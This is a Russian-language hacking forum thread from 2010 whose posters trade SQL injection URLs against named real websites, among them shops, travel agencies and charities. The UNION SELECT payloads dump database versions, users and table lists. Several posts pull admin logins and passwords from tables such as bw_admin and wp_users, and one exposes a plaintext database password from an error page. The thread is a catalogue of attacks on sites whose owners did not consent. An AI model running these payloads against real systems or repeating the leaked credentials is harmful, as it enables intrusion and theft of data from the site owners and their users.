ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12101  
Старый 10.05.2010, 14:26
Dare
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979

Репутация: 53
Отправить сообщение для Dare с помощью ICQ
По умолчанию

Код:
http://theosophytrust.org/tlodocs/articlesRC.php?d=The_Occult_Side_Of_Nature.htm&p=-35+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10--+
version:4.0.27-max-log
user:hermes_db@208.109.138.107

Код:
http://www.truthcommission.org/commission.php?lang=en&cid=0+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5--+
version:5.0.77:37614_dbtruthcom
user:37614_truthcom@lnh-www1i.bluehalo.myregisteredsite.com

Последний раз редактировалось Dare; 10.05.2010 в 14:32..
 
Ответить с цитированием

  #12102  
Старый 10.05.2010, 15:09
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.finishertriatlon.com/revista/noticias.php?id=-121+union+select+1,aes_decrypt(aes_encrypt(concat_ ws(0x3a,user(),version(),database(),@@version_comp ile_os),1),1),3,4,5&year=2010
 
Ответить с цитированием

  #12103  
Старый 10.05.2010, 15:17
BaleHoK
Участник форума
Регистрация: 30.09.2007
Сообщений: 116
Провел на форуме:
140305

Репутация: 14
По умолчанию

www.tamaris.de/home/collection/shoes/l/1/detail/1 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17, 18--9/c/1.html?request=1
 
Ответить с цитированием

  #12104  
Старый 10.05.2010, 15:19
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.mortarinvestments.eu/vehicle.php?id=-171+union+select+1,2,3,4,concat(user(),version(),d atabase(),@@version_compile_os),6,7,8

http://www.emantravel.com/article.php?id=-77+union+select+concat_ws(0x3a,user(),version(),da tabase(),@@version_compile_os),2

http://www.mtg.es/en/diseno_todostallas.php?enid=-8+union+select+1,2,3,concat_ws(0x3a,user(),version (),database(),@@version_compile_os),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41

http://www.norica.es/index.php?opt=2&id=-323+union+select+1,2,3,4,5,concat(user_login,char( 58),user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19 ,20+from+test.wp_users+limit+0,1--
+phpinfo
http://www.norica.es/phpinfo.php


Последний раз редактировалось Konqi; 10.05.2010 в 16:04..
 
Ответить с цитированием

  #12105  
Старый 10.05.2010, 21:21
BaleHoK
Участник форума
Регистрация: 30.09.2007
Сообщений: 116
Провел на форуме:
140305

Репутация: 14
По умолчанию

www.websiteicons.net/index.php?id=-6 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13--&p=icons

www.companycoltd.com/company_coltd.php?company_id=f620555555555 union select 1,@@version,3,4,5,6,7,8,9,10,11,12,13--

www.berlin.de/tourismus/unterkunft/pensionen/mirnet/hotel/buchung/anfrage.php3?objektnr=38 union select version(),2,3,4,5,6,7--&p=1&s=de&an=&ab=

Последний раз редактировалось BaleHoK; 10.05.2010 в 22:44..
 
Ответить с цитированием

  #12106  
Старый 11.05.2010, 00:36
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

для гурманов алкогольной продукции....

Код:
http://www.bestwine.ru/index.php?action=product_view&id=-768+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+--
version : 5.0.67-log
user : u93285@10.10.153.168
database : u93285
os : unknown-freebsd6.2

Код:
http://www.bestwine.ru/index.php?action=product_view&id=-768+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),login,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+bw_admin--
 
Ответить с цитированием

  #12107  
Старый 11.05.2010, 00:41
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

честно сказать, не знаю, можно-ли назвать это инъекцией или нет, но вот:
http://www.evidenceofhumanity.org/story.php?id=9'
в результате имеем:
Код:
[dbserver] => localhost [dbusername] => evidence_admin [dbpassword] => 53889160Cody [dbdatabase] => evidence_evidence [dbProvider] => MySQL
думаю, это самое интересное
 
Ответить с цитированием

  #12108  
Старый 11.05.2010, 12:21
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

Код:
http://www.vestidos.ru/pages/catalog.php?cid=-97+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17+--
version : 5.0.24-standard
user : vestidos@localhost
database : db_vestidos
os : pc-linux-gnu
 
Ответить с цитированием

  #12109  
Старый 11.05.2010, 13:25
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.konqi.com/en/read_article.asp?articleid=-69+union+select+1,password,3,4,5,6,7,8,9,10+from+u ser

ms_access
 
Ответить с цитированием

  #12110  
Старый 11.05.2010, 18:39
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.gourmandisedesserts.com
ТИЦ: 0
PR: 3
Пример запроса:
Код:
http://www.gourmandisedesserts.com/class.php?id=-65+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,table_name),null,5,null,null,null,9,10,11,12,null,14+from+information_schema.tables--+
version - 5.0.67.d7-ourdelta-log
user - gourmandise@72.167.232.226
database - gourmandise
os - unknown-linux-gnu
tables:

Код:
CHARACTER_SETS,   
CLIENT_STATISTICS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
INNODB_BUFFER_POOL_CONTENT,   
INDEX_STATISTICS,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TABLE_STATISTICS,   
TRIGGERS,   
USER_PRIVILEGES,   
USER_STATISTICS,   
VIEWS,   
classes
==========================================

Сайт: http://www.doors007.ru
ТИЦ: 10
PR: 1
Пример запроса:
Код:
http://www.doors007.ru/item2.php?id=-252+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,table_name),4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables--+
version - 5.0.89-Max-log
user - k0038kze_db@c10-w.ht-systems.ru
database - k0038kze_stroyka
os - unknown-linux-gnu
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
doc,   
doc_group,   
docs_mode,   
doors007_links,   
faq,   
folder,   
folder_optional_parameters,   
fo
==========================================

Сайт: http://www.mosadharavkook.com
ТИЦ: ?
PR: 2
Пример запроса:
Код:
http://www.mosadharavkook.com/store/item2.php?id=-408+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
version - 4.1.22-standard
user - mravkook_yoni@localhost
database - mravkook_catalog
os - pc-linux-gnu

==========================================

Сайт: http://www.northcitymarine.com.au
ТИЦ: 0
PR: 0
Пример запроса:
Код:
http://www.northcitymarine.com.au/item2.php?id=-15+union+select+1,2,3,4,5,6,7,8,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),10,11,12,13,14,15,null,17--+
version - 4.0.27-standard
user - ZR12600_ncmmain@204.14.110.100
database - ZR12600_ncmsite
os - pc-linux-gnu

Последний раз редактировалось aka_zver; 11.05.2010 в 22:12..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ